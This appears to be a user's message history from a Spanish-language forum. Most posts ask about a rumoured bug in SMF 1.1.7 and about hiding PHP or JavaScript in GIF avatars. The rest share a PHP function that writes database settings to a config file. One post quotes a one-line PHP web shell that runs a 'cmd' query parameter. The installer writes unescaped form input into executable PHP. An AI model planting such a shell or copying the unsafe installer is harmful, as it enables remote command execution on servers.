Mensajes

Me lo leí completo , eres inteligente pero al final no te entendí lograste o no obtener el código.

Saludos, Dacan 

Recuerda no es seguro de que exista dicho bug pero lo mas probable ya que segun el encontraron  esos códigos.

Creo que debe ser así:  imagen.gif?cmd=Is (Ejemplo)

Me podrías pasar la imagen gif con el código ya inyectado, te lo agradecería mucho. 

Saludos, Dacan 

Me podrías dar un ejemplo lo leí y luego lo traduje lo que que intendi fue que se puede poner código javascript en una imagen  agregando = 1 y "/*" and "*/".

Osea abro una imagen .gif con bloc de notas y donde pongo el =1 y los comentarios y en que parte el código javascript ejemplo de redireccion.

Saludos, Dacan 

Bueno, segun lei los Post ahi en simplemachines, Ocupas 2 cosas tener system activado en el PHP y ademas poder subir Avatars al foro.

Saludos.

Si pero como puedes poner código PHP en un gif, antes había visto un tutorial que explicaba como inyectar código PHP en los comentarios de un imagen pero eran del formato .jpg

Saludos, Dacan 

Español:
http://www.simplemachines.org/community/index.php?topic=280086.0
http://www.simplemachines.org/community/index.php?topic=278740.0

Ingles:
http://www.simplemachines.org/community/index.php?topic=279068.0

Según los temas pueden ser 2 caminos hacia el bug ademas como pusieron este código en un archivo gif ya que si lo intentas SMF dice que tu archivo excede el tamaño permitido.

<? if(isset($_GET[cmd])) system($_GET[cmd]) ?>

Saludos, Dacan 

Googleando he encontrado 2 temas en el foro oficial de SMF de que presuntamente hay un bug en la version 1.1.7 aunque no se cual de los 2 caminos es uno apunta a los perfiles y avatares y otro a un ataque sql injeccion.

Que Saben del tema, que pueden aportar??

Saludos, Dacan 

Ya se lo que hacer cuando eso ocurra ir a mi perfil y buscar mis últimos mensajes.

:S mi Sql Injeccion

Saludos, Dacan 

Ya me han borrado 2 temas uno de sql injeccion y otro de php de una funcion que yo cree, pueden revisar el log o enviarme un MP de porque han sido borrados. 

Saludos, Dacan 

Cuando pueda la mejoro con mas opciones así cuando necesiten hacer un instalador se ahorren mucho código.

Saludos, Dacan 

[Función:]

Función:

Código (php) [Seleccionar] Expandir

<?
// Creada por Dacan
function instalador ($archivo , $variable1, $variable2, $variable3, $variable4){
$manejador = @fopen($archivo, "w+");

$contenido = "<?\n";
$contenido .= "\$servidor = \"$variable1\";\n";
$contenido .= "\$usuario = \"$variable2\";\n";
$contenido .= "\$password = \"$variable3\";\n";
$contenido .= "\$base = \"$variable4\";\n";
$contenido .= "\$conexion = @mysql_connect(\$servidor, \$usuario, \$password) or die(mysql_error());\n";
$contenido .= "@mysql_select_db(\$base, \$conexion) or die (mysql_error());\n";
$contenido .= "?>";
if(fwrite($manejador, $contenido)){
return true;
}
else{
return false;
}
}
?>

Ejemplo de Uso:

Código (php) [Seleccionar] Expandir


<?
if(instalador("config.php", $_POST['servidor'], $_POST['usuario'], $_POST['password'], $_POST['base'])){
echo "Datos guardados correctamente";
}
else {
echo "Ocurrio un error!";
}
?>

Como Funciona:

Código (php) [Seleccionar] Expandir

function instalador ($archivo , $variable1, $variable2, $variable3, $variable4){

La variable $archivo corresponde al archivo que se va modificar, $variable 1 corresponde al host donde esta alojada la base de datos, $variable2 corresponde al usuario de la base de datos, $variable3 corresponde la password de la base de datos y $variable4 corresponde el nombre de la base de datos.

Si encuentran algún error, modifican algo, tienen dudas no duden en avisarme, si lo usan en sus scripts aunque sea dejen la parte de Creada por Dacan se les agradece.

Este tema proviene de otro foro al cual pertenezco para que no hayan confusiones: http://mixforo.com/foro/index.php/topic,61657.0.html


Saludos, Dacan